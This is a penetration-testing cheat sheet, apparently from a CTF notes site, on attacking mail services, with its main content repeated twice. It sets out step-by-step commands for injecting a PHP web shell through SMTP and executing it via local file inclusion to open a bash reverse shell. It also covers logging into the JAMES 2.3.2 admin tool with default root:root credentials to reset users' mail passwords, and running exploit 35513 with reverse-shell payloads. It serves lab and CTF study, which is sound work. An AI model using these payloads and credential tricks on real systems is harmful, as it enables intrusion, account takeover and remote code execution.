Email SMTP

Read emails

telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah

Send email with telnet

SMTP: 25
Bonus: Inject a php exploit.. you will need an LFI to read/execute it though

telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:pwn@hacked.com
rcpt to:askerisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit

sendmail with attachment

Instead of telnet, EHLO, blah blah...
Send a Reverse shell php

> sendmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f mike@mike.com

execute and connect

LFI Execution Example (for after you've sent the evil email)

> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal

Files

cat /var/mail/askerisk

Thunderbird

If you have a user/pass, you can open thunderbird to browser emails
You might find a password that you could use for SSH too!! REF: solidstateHTB

thunderbird
create new account: email
mindy@$10.x.x.x
password
read emails

James Server 2.3.2

Java Apache Mail Enterprise Server (JAMES)
- Open source SMTP and POP3 mail transfer agent and NNTP news server
- Default Login: root:root
Connect and Reset user-email password

nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password

James Server Exploit 2.3.2 (RCE)

35513 will get you a full-shell
Requirements:
- Default login: root/root
- Must have a working ssh login user/pass (limited is ok)
- Need to update the payload for reverse-connect
Will add a weird user account: ../../../etc/bash_completion.d
Sends email to our 'weird' user-directory
When anybody logs into ssh, we will get execution
Confused?
- Yes, you need an ssh login already.. but if its limited it wont do much
- This will get you a full-shell, instead of a limited
- Next step is to look for PrivEsc !!

searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell

PreviousChar Evasion Tricks NextEternal Blue

Last updated 2 years ago

Was this helpful?

Read emails

telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah

Send email with telnet

SMTP: 25

Bonus: Inject a php exploit.. you will need an LFI to read/execute it though

REF:

telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:pwn@hacked.com
rcpt to:askerisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit

execute and connect

LFI Execution Example (for after you've sent the evil email)

> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal

James Server 2.3.2

Java Apache Mail Enterprise Server (JAMES)

Open source SMTP and POP3 mail transfer agent and NNTP news server
Default Login: root:root

Connect and Reset user-email password

Then use email to look for clues

nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password

James Server Exploit 2.3.2 (RCE)

35513 will get you a full-shell

Requirements:

Default login: root/root
Must have a working ssh login user/pass (limited is ok)
Need to update the payload for reverse-connect

Will add a weird user account: ../../../etc/bash_completion.d

Sends email to our 'weird' user-directory

When anybody logs into ssh, we will get execution

Confused?

Yes, you need an ssh login already.. but if its limited it wont do much
This will get you a full-shell, instead of a limited
Next step is to look for PrivEsc !!

searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell

Email SMTP

Read emails

Send email with telnet

sendmail with attachment

execute and connect

Files

Thunderbird

James Server 2.3.2

James Server Exploit 2.3.2 (RCE)

More

Email SMTP

Read emails

Send email with telnet

sendmail with attachment

execute and connect

Files

Thunderbird

James Server 2.3.2

James Server Exploit 2.3.2 (RCE)

More